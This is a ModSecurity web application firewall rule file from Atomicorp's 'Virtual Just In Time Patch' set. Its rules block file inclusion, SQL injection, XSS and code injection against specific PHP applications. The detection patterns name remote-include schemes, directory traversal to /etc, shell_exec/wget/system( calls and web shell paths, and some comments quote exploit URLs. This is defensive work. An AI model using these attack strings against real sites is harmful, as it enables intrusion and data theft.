SecRule REQUEST_URI "\.php" "chain,id:390162,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BasiliX BSX_LIBDIR File Inclusion Vulnerabilities'"
SecRule ARGS:BSX_LIBDIR "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 310019: PowerPortal "file_name[]" File Inclusion Vulnerability
#SecRule REQUEST_URI "index\.php" "chain,id:390163,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Powerportal File Inclusion Vulnerabilities'"
#SecRule REQUEST_URI "file_name\[\].*(?:(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\.\./\.\.)"
# Rule 310019: DeluxeBB "templatefolder" File Inclusion Vulnerability
SecRule REQUEST_URI "/templates/" "chain,id:390164,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: DeluxeBB teplatefolder File Inclusion Vulnerabilities'"
SecRule ARGS:templatefolder "(?:(?:ht|f)tps?:/|\.\./\.\.)"
# Rule 390167: amamber exploit
SecRule REQUEST_URI "/(?:linkpoint|config)\.inc\.php\?config\[root_dir\]=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/" "id:390167, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: amamber remote include'"
#LinPHA "maps_type" Local File Inclusion Vulnerability
SecRule REQUEST_URI "plugins/maps/map\.main\.class\.php" "chain,id:390170, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LinPHA maps_type Local File Inclusion Vulnerability'"
SecRule ARGS:maps_type "(?:\.\.|/etc)"
#Mole "viewsource.php" Information Disclosure Vulnerabilities
SecRule REQUEST_URI "viewsource\.php" "chain,id:390171, rev:1, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mole viewsource.php Information Disclosure Vulnerabilities'"
SecRule ARGS:dirn|ARGS:fname "(?:\.\.|/etc)"
#Index SQL in cat variable
SecRule REQUEST_URI "index\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:390173, rev:3, severity:2, msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: index.php cat SQL injection'"
SecRule ARGS:cat "(?:\[|\;|\<|\>|\*|\||\'|\&|\$|\!|\?|\#|\[|\]|\{|\}|\:|\'|\"|\]|union(?:\+| )select|wp_users|user_pass ?, ?char)"
#Tikiwiki tiki-graph_formula.php f parameter Function Injection Vulnerability
SecRule REQUEST_FILENAME "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390174,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php f parameter Function Injection Vulnerability'"
SecRule ARGS_NAMES "^\s*f\["
#SecRule ARGS_NAMES "^\s*f\[.*\]$"
# Tikiwiki tiki-graph_formula.php link inclusion attempt
SecRule REQUEST_FILENAME "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390175,rev:2, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php link inclusion attempt'"
SecRule ARGS:/^\s*[a-z]+$/ "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
# Tikiwiki XSS in remind password field
SecRule REQUEST_METHOD "POST" "chain,t:none,id:390176,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki lost password XSS'"
SecRule REQUEST_FILENAME "tiki-remind_password\.php" "chain,t:none,t:lowercase"
SecRule ARGS:username "!^(:?[a-z0-9\-\_]{1,37})$" "t:none,t:urlDecodeUni,t:lowercase"
#Tikiwiki XSS in feastured link
SecRule REQUEST_URI "tiki-featured_link\.php" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TikiWiki featured link XSS attempt'"
SecRule ARGS:type "iframe"
#Tikiwiki listpages mysql password disclosure attempt
SecRule REQUEST_URI "tiki-listpages\.php" "chain,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:393677,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiwiki listpages mysql passwd disclosure attempt'"
SecRule ARGS:sort_mode "!^(pagename|hits|lastmodif|creator|user|version|comment|flag|versions|links|backlinks|size)_(asc|desc)$"
#Horde Webmail XSS
SecRule REQUEST_URI "addevent\.php" "chain,t:htmlEntityDecode,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390178,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde Webmail XSS'"
SecRule ARGS:url "(?:script|iframe)"
#gCards 1.46 SQL
SecRule REQUEST_URI "getnewsitem\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: gCards 1.46 SQL'"
SecRule ARGS:newsid "(?:gc_cardusers|union select|\(username|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#Joovili "category" SQL Injection Vulnerability
SecRule REQUEST_URI "browse\.videos\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390181,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joovili category SQL injection vulnerability'"
SecRule ARGS:category "(?:joovili_(?:admins|users)|admin_(?:username|password)|id,username,password,email|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#Jokes Site Script "catagorie" SQL Injection Vulnerability
SecRule REQUEST_URI "jokes\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390182,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Jokes Script catagorie SQL injection vulnerability'"
SecRule ARGS:catagorie "(?:concat\(|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#WordPress download Monitor Plugin "id" SQL Injection Vulnerability
SecRule REQUEST_URI "wp-download_monitor/download\.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,id:390183,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress download Monitor Plugin id SQL injection vulnerability'"
SecRule ARGS:id "(?:concat\(|(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\'|union.*select.*from)"
#Bits Listing Injection Vulnerability
SecRule REQUEST_URI "bits_listings\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390184,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Bits Listing Injection vulnerability'"
SecRule ARGS:svr_rootPhpStart "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#sendreminders name injection
SecRule REQUEST_URI "(?:send_reminders|modules)\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390185,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SendReminders Injection vulnerability'"
SecRule ARGS:name|ARGS:noSet "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#tikiprint injection
SecRule REQUEST_URI "tikiprint\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390186,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tikiprint page Injection vulnerability'"
SecRule ARGS:page "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#up.php?my[root]
SecRule REQUEST_URI "/up\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390187,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: up.php my_root Injection vulnerability'"
SecRule ARGS:my[root] "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#Tikiwiki tiki-graph_formula.php path recursion vulnerability
SecRule REQUEST_URI "tiki-graph_formula\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390188,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki tiki-graph_formula.php path recursion Vulnerability'"
SecRule ARGS "\.\./\.\."
#Tikiwiki tiki-read_article.php path recursion vulnerability
SecRule REQUEST_URI "tiki-(?:read_article|graph_formula)\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390189,rev:1, severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki file access and injection Vulnerability'"
SecRule ARGS:title "(?:\.\./\.\.|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
#Force download injection
#force_download.php?file
SecRule REQUEST_URI "/force_download\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390190,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forcedownload file Injection vulnerability'"
SecRule ARGS:file "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#config.php?path_to_root
SecRule REQUEST_URI "/config\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390191,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Config path_to_root Injection vulnerability'"
SecRule ARGS:path_to_root "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#search.php?exec
SecRule REQUEST_URI "/search\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390192,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search.php exec Injection vulnerability'"
SecRule ARGS:exec "(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
#wp-download.php?dl_id SQL injection
SecRule REQUEST_URI "/wp-download\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390194,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: wp-download SQL injection vulnerability'"
SecRule ARGS "wp_users" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:lowercase,t:removeWhiteSpace"
#index.php menu_id SQL injection
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390195,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: index.php menu_id SQL injection vulnerability'"
SecRule ARGS:menu_id "(?:wmp_admin|adminuser|adminpass)" "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:replaceNulls,t:replaceComments,t:lowercase,t:removeWhiteSpace"
#class.admin_menu_lms.php?where_framework= injection
SecRule REQUEST_URI "/class\.admin_menu_lms\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390197,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: class.admin_menu_lms.php injection vulnerability'"
SecRule ARGS:where_framework "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
#admin_frame.php?ltarget=/../../
SecRule REQUEST_URI "/admin_frame\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390198,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: admin_frame.php ltarget injection vulnerability'"
SecRule ARGS:ltarget "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
#admin_frame.php?ltarget=/../../
SecRule REQUEST_URI "/index\.php" "chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390199,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: FOG Forum injection vulnerability'"
SecRule ARGS:fog_langyy|ARGS:fog_skin "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
#Joomla token attack
#
SecRule REQUEST_URI "/index\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390200,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla token exploit'"
SecRule ARGS:option "com_user" chain
SecRule ARGS:task "confirmreset" chain
SecRule ARGS:token "^'$"
#CoAST "sections_file" File Inclusion Vulnerability
SecRule REQUEST_URI "/header\.php" "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390201,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CoAST sections_file File Inclusion Vulnerability'"
SecRule ARGS:sections_file "(?:\.\./\.\.|/etc|(?:gopher|ogg|zlib|(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/))"
#PHP-Lance "catid" SQL Injection Vulnerability
SecRule REQUEST_URI "/show\.php" "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390202,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Lance catid SQL Injection Vulnerability'"
SecRule ARGS:catid "'"
#Pro Chat Rooms "gud" SQL Injection Vulnerability
SecRule REQUEST_URI "profiles/admin\.php" "t:none,t:urlDecodeUni,t:lowercase,t:normalisePath,t:replaceNulls,t:urlDecodeUni,t:compressWhiteSpace,chain,id:390203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Pro Chat Rooms gud SQL Injection Vulnerability'"
SecRule ARGS:gud "'"
#Joomla injection
SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:393602,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla option argument illegal character injection'"
SecRule ARGS:option "(%|\(|\)|\^|\'|\{|\}|\[|\]|\$|;|:|#)"
#Joomla injection
SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390603,rev:6,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla illegal characters in argument'"
SecRule ARGS:option "com_content" chain
SecRule ARGS:view|ARGS:layout "(\%|\(|\)|\^|\'|\`|\{|\}|\[|\]|\$|;|#|,|\*)"
#Joomla positive rule 1
SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390604,rev:9,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla ARG injection'"
SecRule ARGS:option "com_content" chain
SecRule ARGS:print|ARGS:itemId "!(^-?[0-9-]+$|^$|[0-9]+[/|>|\?]$)"
#Joomla positive rule 2
#SecRule REQUEST_URI "index\.php\?" #"capture,capture,chain,t:none,t:lowercase,id:390605,rev:19,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla id ARG injection',logdata:'%{TX.0}'"
#SecRule ARGS:option "com_content" chain
#SecRule ARGS:id "!(^-?[0-9]+$|^-?[0-9]+\:[a-z0-9\-' ]+(&|$)|^$|^(\%|\.|\:|\!|-|\'|_| |\\|[0-9]|\p{L}|[a-z])+$)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#SecRule ARGS:id "!(:u(^-?[0-9]+$|^-?[0-9]+\:[a-z0-9\-' ]+(&|$)|^$|^[-\' \p{L}]+$))" "t:none,t:lowercase"
#Joomla positive rule 3
SecRule REQUEST_URI "index\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390606,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla ARG injection'"
SecRule ARGS:option "com_content" chain
SecRule ARGS:view|ARGS:tmpl|ARGS:layout "!(^[0-9a-z\-\:]+$|^$)"
#Joomla positive rule 4
#SecRule REQUEST_URI "index\.php\?" #"chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390607,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla page ARG injection'"
#SecRule ARGS:option "com_content" chain
#SecRule ARGS:page "!(^-?[0-9\-\.]+$|^$)"
SecRule REQUEST_URI "template_css\.php\?" "chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,id:390608,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla template_css ARG injection'"
SecRule ARGS:w|ARGS:h|ARGS:sw "!(^[0-9\-]+$)"
# Rule 340075: PHPBB worm sigs
#SecRule REQUEST_URI "!(tiki-searchindex\.php)" #SecRule ARGS:highlight "(?:\x2527|%2527)"
#SecRule ARGS:highlight "(?:\x27|%27|\x2527|%2527)"
# Rule 390609:Joomla XSS injection
# index.php
# option=com_search area
SecRule REQUEST_URI "index\.php" "chain,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:390609,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Joomla ARGS Cross Site Scripting Attack'"
SecRule ARGS:option "com_search" chain
SecRule ARGS "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|iframe |\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|script |shell\:|window\.location)"
# Rule 380009: ATutor Multiple Vulnerabilities
#SecRule REQUEST_URI "(body_header\.inc|print)\.php\?section.*\x00" # "id:380009,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: ATutor exploit attempt'"
#SecRule REQUEST_URI "^/administrator/index\.php\?option=com_wxparams" # "id:343869,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skipAfter:END_JOOMLA_POSITIVE"
#SecRule REQUEST_URI "/index\.php" # "t:none,t:urlDecodeUni,t:lowercase,chain,id:390610,rev:15,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
#SecRule ARGS:view "[a-z0-9]." chain
#SecRule ARGS:format|ARGS:type|ARGS:layout "('|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\!|\|)"
#SecMarker END_JOOMLA_POSITIVE
SecRule REQUEST_URI "/index\.php!(type=rss;action=\.xml$)" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390611,rev:11,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
SecRule ARGS:id|ARGS:type|ARGS:view "[a-z0-9]." chain
SecRule ARGS:format|ARGS:type|ARGS:layout "('|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\!|\|)"
#lxlabs SQL injection protection
SecRule REQUEST_URI "index\.php" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:330600,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: LXLabs SQL injection attack'"
SecRule ARGS:frm_clientname "(?:(?:union|select|realpass) |\()"
#block web inspect scans
SecRule ARGS "^www\.webinspect\.hp\.com" "t:none,t:urlDecodeUni,t:lowercase,id:330601,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WebInspect Scanner Attack'"
#start at 390615
#SecRule REQUEST_URI "/index\.php" # "t:urlDecodeUni,t:lowercase,chain,id:330602,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
#SecRule ARGS:view "[a-z0-9]." chain
#SecRule ARGS:format|ARGS:type|ARGS:layout "/"
SecRule REQUEST_URI "/index\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:330603,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
SecRule ARGS:id "[a-z0-9]." chain
SecRule ARGS:format|ARGS:layout "/"
#faq.php?cid='
SecRule REQUEST_URI "/faq\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:330604,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: faq.php Cid ARG SQL injection'"
SecRule ARGS:cid "'"
#search_result.php?host_id='
SecRule REQUEST_URI "/search_?result\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:330605,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: search_result.php HOSTid ARG SQL injection'"
SecRule ARGS:hostid|ARGS:host_id "'"
#Tikiwiki Spam harvester rule
#/tiki-listpages.php?find=XsAwSPBeY&maxRecords=20&initial=w
#SecRule REQUEST_URI "tiki-listpages.php\?find=.*maxrecords=.*initial=" # "t:urlDecodeUni,t:lowercase,id:330606,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tikiwiki Spam Harvest List Pages attack'"
#FCKEditor upload
#fckeditor/editor/filemanager/connectors/php/upload.php?Type=File
SecRule REQUEST_URI "fckeditor/editor/filemanager/connectors/php/upload\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390627,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: possible fckeditor file upload attack (disable this rule if you use this function)'"
SecRule ARGS:type "file"
#Zen Cart SQL injection
SecRule REQUEST_URI "/sqlpatch\.php" "chain,t:none,t:urlDecodeUni,t:lowercase,id:390628,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zen Cart SQL injection exploit'"
SecRule ARGS "sql@jah"
SecRule REQUEST_URI "/(?:sqlpatch|record_company)\.php.*\.php" "t:none,t:urlDecodeUni,t:lowercase,id:381628,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zen Cart SQL injection exploit'"
#Joomla invalid characters
SecRule REQUEST_URI "/index\.php" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390630,rev:8,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters'"
SecRule ARGS:format|ARGS:type|ARGS:layout "(\'|\:|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\$|\,|\;|\!|\`|\|)" chain
SecRule ARGS:type "!(rss;|[a-z]+\|html|catalogrule-rule_condition_product)" "chain"
SecRule ARGS:option "^com_jomres$"
#http://DOMAIN_NAME.TLD/wp-login.php?action=rp&key[]=
#SecRule REQUEST_URI "/wp-login\.php" # "t:urlDecodeUni,t:lowercase,chain,id:390631,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress <= 2.8.2 Remote admin reset password exploit'"
#SecRule ARGS:key[] ".*"
#block invalid characters in format ARG
#SecRule REQUEST_URI "/index\.php" # "t:urlDecodeUni,t:lowercase,chain,id:390632,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters format variable in RSS request'"
#SecRule ARGS:format "(/|\'|\:|\(|\)|\[|\]|\}|\{|\#|\@|\^|\*|\.|\%|\"|\$|\,|\;|\!|\`|\|)"
#block invalid characters in format ARG
SecRule REQUEST_URI "/index\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390633,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla invalid characters format variable in RSS request'"
SecRule ARGS:view "(\%)" chain
SecRule ARGS:page "!(admin)"
#JITP for really poorly documented wordpress vulnerability
SecRule REQUEST_URI "/index\.php" "phase:2,log,deny,log,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390634,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress plugin WP-Syntax Remote Command Execution'"
SecRule ARGS "^session_start$" chain
SecRule ARGS "(?:base64_decode|decode_base64)"
#/index.php?main_page=conditions//admin/record_company.php/password_forgotten.php?action=insert
SecRule REQUEST_URI "/password_forgotten\.php" "log,deny,status:403,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,chain,id:390637,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zencart PHP code injection attack'"
SecRule ARGS:action "^insert$" chain
SecRule ARGS|REQUEST_BODY "(php|;+|shell_exec|(?:w|ftp)get|system\()"
#/index.php?main_page=conditions//admin/record_company.php/password_forgotten.php?action=insert
SecRule REQUEST_URI "/password_forgotten\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,t:compressWhiteSpace,t:lowercase,chain,id:390638,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Zencart PHP code injection attack'"
SecRule ARGS:admin_email "(union select|php|;+|shell_exec|(?:w|ftp)get|system\()"
#Megabook XSS
SecRule REQUEST_URI "cgi-bin/admin\.cgi" "log,deny,log,auditlog,t:urlDecodeUni,t:lowercase,chain,id:390644,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MegaBook XSS attack'"
SecRule ARGS:entryid "\""
#index.php?controller=%0AA:B&id=10&option=com_tagtrends
SecRule REQUEST_URI "index\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:replaceNulls,t:compressWhiteSpace,t:lowercase,chain,id:390645,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla TagTrends variable injection attack'"
SecRule ARGS:controller "!^[0-9a-z]+$" chain
SecRule ARGS:option "com_tagtrends"
SecRule REQUEST_URI "index\.php" "log,deny,log,auditlog,t:none,t:lowercase,chain,id:390646,rev:5,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla TagTrends variable injection attack'"
SecRule ARGS:controller "%" chain
SecRule ARGS:option "com_tagtrends"
SecRule REQUEST_URI "admin/(?:cmd|sql|php)shell\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390647,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Horde command shell access'"
SecRule REQUEST_URI "vbroot/faq\.php" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390649,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible vBulletin database credentials theft'"
SecRule REQUEST_URI "/faq\.php?s=database" "log,deny,log,auditlog,t:none,t:urlDecodeUni,t:lowercase,id:390650,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible vBulletin database credentials theft'"
#Really badly written application
#SecRule ARGS:password|ARGS:username "(?:\'|\`)" # "t:none,chain,log,deny,auditlog,id:390552,rev:3,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible SQL injection in password or username field, disable this rule if you know your application is not vulnerable to this.'"
#SecRule REQUEST_URI "!(/ucp\.php|\?app=core&module=global|/authenticate\.php\?accessdenied)"
#Remarkably vulnerable application
#/owl/locale/English/help/help_register.php?==&expand=1&order=name&parent=&sess=SQL_inject
SecRule REQUEST_URI "/owl/" "chain,log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390570,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Owl SQL injection attack',logdata:'%{TX.0}'"
SecRule ARGS:sess|ARGS:type|ARGS:expand "(\%|-|;|\)|\(|/|'|=|\*|#|\")"
#Remarkably vulnerable application
#/owl/locale/English/help/help_register.php?==&expand=1&order=name&parent=&sess=SQL_inject
